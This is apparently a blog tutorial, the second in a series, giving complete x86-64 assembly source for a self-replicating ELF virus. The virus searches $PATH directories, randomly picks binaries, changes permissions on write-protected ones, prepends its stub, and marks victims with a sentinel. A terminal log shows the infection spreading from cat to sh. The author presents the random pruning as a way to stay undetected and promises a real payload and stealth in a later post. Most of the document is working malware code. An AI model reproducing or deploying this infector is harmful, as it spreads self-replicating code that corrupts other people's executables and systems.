A technique for ELF file infection - part 2.
In the previous blog post, I demonstrated a method of infecting ELF files. In this post, I would like to present a slightly improved version with additional features. The previous version of the infection code could only infect a single file, while the new version will be able to find potential host files and infect them automatically.
A good source of potential victim files is the
$PATH environment variable, which contains a list of directories that may contain executable files. The program will search these directories for ELF files and infect them. The program will also check if the file is already infected to prevent infecting the same file multiple times. In addition, the program will ensure that it only attempts to infect ELF files that it has access to.
To begin, I will embed a marker in the stub to make it easily recognizable and add safety guards in case
execve fails. I will pass the
argp argument in
rdi to the
payload function so that it can use the
$PATH to find potential victim files.
format ELF64 executable use64 ; XXX: You have to set this to the resulting ELF file size manually. SIZE equ 1486 ; XXX: You have to set this to the position of the "palaiologos" string ; in the binary yourself. SENTINEL_LOC equ 120 sys_execve equ 59 sys_open equ 2 sys_lseek equ 8 sys_memfd_create equ 319 sys_sendfile equ 40 sys_close equ 3 sys_exit equ 60 sys_getdents equ 78 sys_access equ 21 sys_stat equ 4 sys_chmod equ 90 entry _start sentinel: db 'palaiologos',0 memfd_path: db '/proc/self/fd/',0,0 self: db '/proc/self/exe' empty: db 0 size: dq SIZE load_elf: ; Open ourselves. xor esi, esi mov edi, self push sys_open pop rax syscall ; Obtain the length: seek to back. mov r8, rax mov rdi, r8 push sys_lseek pop rax syscall ; Call memfd_create, call with MFD_CLOEXEC. mov edi, empty push 1 pop rsi push sys_memfd_create pop rax syscall ; Copy the file contents to the memfd using sendfile. mov edx, size mov r9, rax mov rdi, rax mov rsi, r8 sub r10d, SIZE push sys_sendfile pop rax syscall ; Close the file descriptor we hold to our own binary. push sys_close pop rax mov rdi, r8 syscall ; Bravely assume that the memfd descriptor number is a single digit. ; This might or might not work all of the times, but improving upon ; this is trivially beyond the scope of this post. add r9d, 48 mov BYTE [memfd_path + 14], r9b ret ; The entry point. _start: ; Load the argp for the payload. mov rdi, [rsp] lea rdi, [rsp+8 + rdi*8 + 8] call payload ; Load the executable to a memfd. call load_elf ; Load the path to the executable mov rdi, memfd_path ; Prepare to call execve ; Load argc + argv lea rsi, [rsp + 8] ; Load argp mov rdx, [rsp] lea rdx, [rsp+8 + rdx*8 + 8] ; Perform the syscall push sys_execve pop rax syscall ; Exit in case execve returns due to error. mov rdi, -1 push sys_exit pop rax syscall
For the purposes of the new payload, I will need a random number generator (to determine whether to infect a file or not), a constant variable with the path separator (to append it between the directory name and the file name), and two auxiliary LCG random number generator variables.
seed: dq 0 pathsep: db "/", 0 LCG_A equ 1103515245 LCG_B equ 12345
Stalking for prey
The payload will be handling large amounts of stack data, so it must reserve sufficient space to ensure that
argp are not overwritten during the process. This is also an opportune time to initialize the random number generator.
; Wants to be called with argp in rdi. payload: ; Reserve a (somewhat arbitrary) amount of stack space. ; It needs to hold a few path buffers (3 buffers, 4096 bytes each) sub rsp, 12456 ; Query the current time stamp counter as a source of randomness. ; rdtsc will set rdx and rax to the higher and lower bits of the time ; stamp counter, so we put them together and store them in the RNG seed ; variable. rdtsc shl rdx, 32 or rdx, rax mov qword [seed], rdx
The next part is more involved, as the code must locate the
$PATH variable in the environment key/value pair table. A simple solution is to iterate until the current envp entry is
NULL and check the prefix of the current entry. If it is
PATH=, discard the first 5 bytes (to skip the key name in the string) and save it to a register. This part is relatively straightforward, but it is essential to guard against environment key/value pairs that are shorter than 5 bytes in total to prevent a potential buffer overflow.
; Find "PATH=" in ARGP. .path_find_loop: ; NULL terminates argp, check for this. mov rax, qword [rdi] test rax, rax je .infect_done ; Load the first five bytes of the current string. ; If any of them is NUL, we skip to the next string. mov cl, byte [rax] test cl, cl je .path_loop_skip mov dl, byte [rax + 1] test dl, dl je .path_loop_skip mov bl, byte [rax + 2] test bl, bl je .path_loop_skip mov sil, byte [rax + 3] test sil, sil je .path_loop_skip mov r8b, byte [rax + 4] test r8b, r8b je .path_loop_skip ; Check if the ASCII values are right. cmp cl, 'P' jne .path_loop_skip cmp dl, 'A' jne .path_loop_skip cmp bl, 'T' jne .path_loop_skip cmp sil, 'H' jne .path_loop_skip cmp r8b, '=' je .path_found .path_loop_skip: ; Go to the next pointer in the argp array. add rdi, 8 jmp .path_find_loop .path_found: add rax, 5
Determine a buffer that will hold the final path to the file that will be infected. As I wrote this program and golfed it in advance, I will also load two constants that might appear to be arbitrary (a syscall number and a divider for the probability of infecting a directory).
; Select the final path buffer. lea r12, [rsp + 4256] ; Load two auxiliary constants. push 3 pop rbx push sys_open pop r8
At this point, the program can now loop through the entries in the
PATH variable and examine each of them. The loop will continue until it encounters a
NULL value (indicating that the
PATH string has been exhausted), and then copies the current path (that is, the string from the current position in the
PATH variable until the first occurrence of a colon or a NUL terminator, whichever comes first).
.path_loop: ; Check if we've hit the end of the PATH variable. mov cl, byte [rax] test cl, cl je .infect_done ; Copy path until : or \0 is found. xor r13d, r13d .copy_path: test cl, cl je .attempt_scan cmp cl, ':' je .attempt_scan mov byte [rsp + r13 + 160], cl mov cl, byte [rax + r13 + 1] inc r13 jmp .copy_path .attempt_scan:
There are a few more things to be done with the path. Firstly, it must be null-terminated. Secondly, if the final character in the
PATH string is a colon, it must be skipped.
; NUL-terminate the path. mov ecx, r13d mov byte [rsp + rcx + 160], 0 xor ecx, ecx ; Check if we have to skip an extra colon. cmp byte [rax + r13], ':' sete cl add rcx, rax ; Decide whether we want to infect this directory. ; Take a random number from a linear congruential generator ; and divide it by three. The modulus of zero means "no". imul rax, qword [seed], LCG_A add rax, LCG_B mov qword [seed], rax xor edx, edx div rbx test rdx, rdx je .next_path
After obtaining a valid directory path, the program should now open it. It is crucial to verify the return code, as PATH entries do not have to be valid (they may not point to an existing directory). If the directory is invalid, it must be skipped.
; O_RDONLY | O_DIRECTORY mov esi, 0x10000 lea rdi, [rsp + 160] mov rax, r8 ; Preserve rcx through the system call. mov qword [rsp], rcx syscall mov rcx, qword [rsp] ; Clever way to determine whether the number is negative. bt eax, 31 jb .next_path ; Save the file descriptor. mov qword [rsp + 8], rax ; Copy the file descriptor elsewhere, because we are going to use ; it now, and it would be a shame if a syscall clobbered it ;). mov rbp, rax
The program will use the fairly low-level system call
getdents to obtain directory entries in batches. Before proceeding, some entries should be randomly pruned to reduce the number of filesystem operations performed (which helps to remain undetected).
.getdents_loop: ; Load max path size. mov edx, 4096 ; Load the directory file descriptor. mov rdi, rbp ; Load the buffer address. lea rsi, [rsp + 8352] push sys_getdents pop rax syscall ; Jump to some common error stub that will close the ; directory descriptor in case of failure. test eax, eax je .getdents_err ; Preserve the amount of entries somewhere. ; eax is often trashed by system calls so we want to ; avoid it being lost. mov r14d, eax xor eax, eax .dir_loop: ; Load the current entry number, directory entries buffer ; and the random seed. mov r15d, eax lea rbx, [rsp + r15] add rbx, 8352 mov rax, qword [seed] .discard_loop: ; Done processing? cmp r14, r15 jbe .getdents_loop ; Extract the type of the directory entry. movzx ecx, word [rbx + 16] mov dl, byte [rbx + rcx - 1] ; Skip if not a regular file. We will not infect symlinks. cmp dl, 8 jne .give_up ; Invoke the LCG again. Skip the entry upfront if dividing by ; four gives modulus 0, that is, last two binary digits of the ; number are 0. imul rax, rax, LCG_A add rax, LCG_B mov qword [seed], rax test al, 3 je .discard_loop
With the file name, it is possible to construct the final buffer with the absolute path to be infected, taking care to address some quirks in the process.
; OK, first nul-terminate the final buffer with the filename ; so that the `concat` function can work properly. Then append the ; directory name to that empty final buffer. mov byte [rsp + 4256], 0 mov rdi, r12 lea rsi, [rsp + 160] call concat ; We need to terminate the path with a slash only if it is not present ; already. Check this. Use a dumb strlen-ish function. mov rax, r12 .len_loop: cmp byte [rax], 0 je .len_ok inc rax jmp .len_loop .len_ok: ; Slash? cmp byte [rax - 1], '/' je .has_slash mov esi, pathsep mov rdi, r12 call concat .has_slash: ; Append the file name now. lea rsi, [rbx + 18] mov rdi, r12 call concat
At this point, the program should check if the file is actually accessible for writing and devise a plan for what to do when it is not. The approach here is to try to temporarily alter the permissions of the file in the hope that it grants the necessary write access. If it does not, the file must be skipped. If it does, the program will restore the original permissions later.
; Check if we can access the file for reading and writing. mov rdi, r12 push 6 ; R_OK | W_OK pop rsi push sys_access pop rax syscall mov rcx, rax ; Decide whether we want to infect this file anyway. ; Same LCG and division stuff, except this time with the ; modulus of 10. imul rax, qword [seed], LCG_A add rax, LCG_B mov qword [seed], rax xor edx, edx push 10 pop rsi div rsi ; Proceed only if: ; (1) the file is not accessible ; (2) we want to infect it ; Handle a special case here: try to add an owner ; write permission bit to the file and see if this lets ; us access it... :). Might protect against some ; "overzealous" (removes write permissions on critical ; executables to avoid problems) but not "overly paranoid" ; (removes write permissions /and/ transfers ownership) users. ; In that case we can do nothing but hope that we get root somehow. test ecx, ecx je .normal_path test rdx, rdx jne .normal_path ; Stat the file. mov rdi, r12 lea rsi, [rsp + 16] push sys_stat pop rax syscall ; Set the owner write permission bit and call chmod. mov esi, dword [rsp + 40] or rsi, 128 mov dword [rsp + 40], esi mov rbp, r12 push sys_chmod pop r12 mov rax, r12 syscall ; Try to access again? mov rdi, rbp push 6 ; R_OK | W_OK again. pop rsi push sys_access pop rax syscall ; Still no? Restore the permissions. test eax, eax jne .restore_perms ; Yes => do infect. mov rdi, rbp call infect .restore_perms: mov esi, dword [rsp + 40] and esi, -129 ; Everything except the bit 7 mov dword [rsp + 40], esi mov rdi, rbp mov rax, r12 syscall ; File still not accessible. Give up. ; Load the directory descriptor. mov rax, qword [rsp + 8] mov r12, rbp mov rbp, rax jmp .give_up
If no difficulties were encountered, the file can be infected now with no extra alterations.
.normal_path: ; Check if we want to infect this file. test rdx, rdx jne .give_up ; Do infect. mov rdi, r12 call infect
Finally, a few fallback labels from the code defined above need to be implemented.
.give_up: ; We end up here when it's time to skip to ; the next directory entry. movzx ecx, word [rbx + 16] movzx eax, cx add eax, r15d jmp .dir_loop .getdents_err: ; We get here when it's time to close the ; directory descriptor and move on. mov rdi, rbp push sys_close pop rbx mov rax, rbx syscall ; Load the sys_open constant again push sys_open pop r8 mov rcx, qword [rsp] .next_path: ; Go to the next path to process add rcx, r13 mov rax, rcx jmp .path_loop .infect_done: ; Balance the stack and yield. add rsp, 12456 ret
The payload employs a
concat procedure to join two nul-terminated strings. The implementation is relatively straightforward and is as follows:
concat: ; Find the end of the first string. cmp byte [rdi], 0 lea rdi, [rdi + 1] jne concat ; Start appending characters in a loop. push -1 pop rax .do_loop: ; Nothing left in the source string. mov cl, byte [rsi + rax + 1] test cl, cl je .done mov byte [rdi + rax], cl inc rax jmp .do_loop .done: ; Null-terminate the string. mov byte [rdi + rax], 0 ret
An improved infection function
The improved infection function will have several qualities that make it superior to the previous version. Most notably, the new infection function includes improved ELF file detection and better protection against re-infection. The process begins by opening the target file and reading and verifying the ELF header.
infect: ; Preserve a bunch of registers that the caller function needs. push r15 push r14 push rbx ; Reserve enough space for the transaction buffer. sub rsp, 200 + SIZE ; Open the goat file w/ O_RDWR. mov rbx, sys_open mov rsi, rbx mov rax, rbx syscall ; Check if the file was opened successfully. bt eax, 31 jb .cleanup ; Read the ELF header. mov r8d, eax lea rsi, [rsp - 112] ; Size of the ELF header. mov rdx, 64 mov rdi, r8 ; sys_read = 0 xor eax, eax syscall ; Check machine type (AMD64, code 62) cmp word [rsi + 18], 62 jne .elf_bad ; ELF class (64-bit) cmp byte [rsp - 108], 2 jne .elf_bad ; Check the 0x7f ELF magic. cmp byte [rsp - 109], 'F' jne .elf_bad cmp byte [rsp - 110], 'L' jne .elf_bad cmp byte [rsp - 111], 'E' jne .elf_bad cmp byte [rsp - 112], 0x7F jne .elf_bad
The function will check for the sentinel to determine if the file has already been infected. If the sentinel is present, the infection process should be terminated.
; Rewind to the SENTINEL_LOC-th byte. We want to check ; if this ELF file was already infected. mov r9, sys_lseek mov rsi, SENTINEL_LOC mov rdi, r8 xor edx, edx mov rax, r9 syscall ; Read 12 bytes (length of "palaiologos\0") lea rsi, [rsp - 128] mov rdx, 12 xor eax, eax syscall ; Check if the sentinel is present. movq xmm0, qword [rsi] movq rax, xmm0 ; Check the first part. mov rcx, 'palaiolo' cmp rax, rcx jne .elf_clean ; Check the remaining bytes: gos\0 cmp byte [rsp - 120], 'g' jne .elf_clean cmp byte [rsp - 119], 'o' jne .elf_clean cmp byte [rsp - 118], 's' jne .elf_clean cmp byte [rsp - 117], 0 jne .elf_clean .elf_bad: ; Close ourselves and return. Already infected. mov rax, 3 mov rdi, r8 syscall jmp .cleanup .elf_clean:
The infection process is not much different from the previous iteration: the code will open the current executable, create a memory-backed file descriptor, and write the infectious stub to it followed by the target file.
; Open self. mov edi, self xor esi, esi mov rax, rbx syscall ; Open a memfd with O_CLOEXEC. mov r10d, eax mov r14, 1 mov edi, empty mov eax, sys_memfd_create mov rsi, r14 syscall ; Copy over the viral stub from ourselves to the memfd. mov ebx, eax lea r15, [rsp - 48] mov edx, SIZE mov rdi, r10 mov rsi, r15 xor eax, eax syscall mov edx, SIZE mov rdi, rbx mov rax, r14 syscall ; Seek to the beginning of the goat file (we want the ELf header back). mov rdi, r8 xor esi, esi xor edx, edx mov rax, r9 syscall ; Copy data from the goat file to the memfd in a loop. .copy_goat_memfd: mov edx, SIZE mov rdi, r8 mov rsi, r15 xor eax, eax syscall test eax, eax je .copy_goat_memfd_done mov edx, eax mov rdi, rbx mov rsi, r15 mov rax, r14 syscall jmp .copy_goat_memfd
After constructing a valid parasitic ELF file, the final step is to rewind both files to the first byte and copy the contents of the memory-backed file descriptor to the target file. An improvement that could be made here is to check whether there is sufficient disk space to append the stub, but this scenario is extremely unlikely to pose an issue, so it is not worth the effort. It could, however, be implemented using
ftruncate followed by appropriate error checking.
; Rewind the goat file and the memfd. .copy_goat_memfd_done: mov rdi, rbx xor esi, esi xor edx, edx mov rax, r9 syscall mov rdi, r8 xor esi, esi xor edx, edx mov rax, r9 syscall ; Overwrite the goat file with the memfd contents. lea rsi, [rsp - 48] .copy_memfd_goat: mov edx, SIZE mov rdi, rbx xor eax, eax syscall test eax, eax je .copy_memfd_goat_done mov edx, eax mov rdi, r8 mov rax, r14 syscall jmp .copy_memfd_goat .copy_memfd_goat_done: ; Close goat, memfd, and self. mov rdx, sys_close mov rdi, rbx mov rax, rdx syscall mov rdi, r8 mov rax, rdx syscall mov rdi, r10 mov rax, rdx syscall .cleanup: ; Balance the stack and quit. add rsp, 200 + SIZE pop rbx pop r14 pop r15 ret
The new, improved ELF file infector is undoubtedly better than the original, however it still lacks a genuine payload, stealthiness, or code compression. I will discuss these topics in the next essay in the series, please stay tuned!
The following terminal session demonstrates the program’s capabilities. I have artificially created an environment with a single-directory
$PATH variable that contains two common UNIX programs. I have linked the
date program to the infector to reduce the amount of text output compared to the previous example using
~ % echo $PATH /home/palaiologos/jail ~ % ls -la jail total 192 drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 . drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 .. -rwxr-xr-x 1 palaiologos palaiologos 44016 Jan 5 00:37 cat -rwxr-xr-x 1 palaiologos palaiologos 125640 Jan 5 00:37 sh ~ % ./stub && ls -la jail Thu Jan 5 12:45:33 AM CET 2023 total 196 drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 . drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 .. -rwxr-xr-x 1 palaiologos palaiologos 45450 Jan 5 00:45 cat -rwxr-xr-x 1 palaiologos palaiologos 125640 Jan 5 00:37 sh ~ % # cat was infected! if we run it now, the shell should also get infected. ~ % ./jail/cat /dev/null && ls -la jail total 196 drwxr-xr-x 2 palaiologos palaiologos 4096 Jan 4 21:59 . drwxr-xr-x 9 palaiologos palaiologos 20480 Jan 4 19:51 .. -rwxr-xr-x 1 palaiologos palaiologos 45450 Jan 5 00:45 cat -rwxr-xr-x 1 palaiologos palaiologos 127074 Jan 5 00:37 sh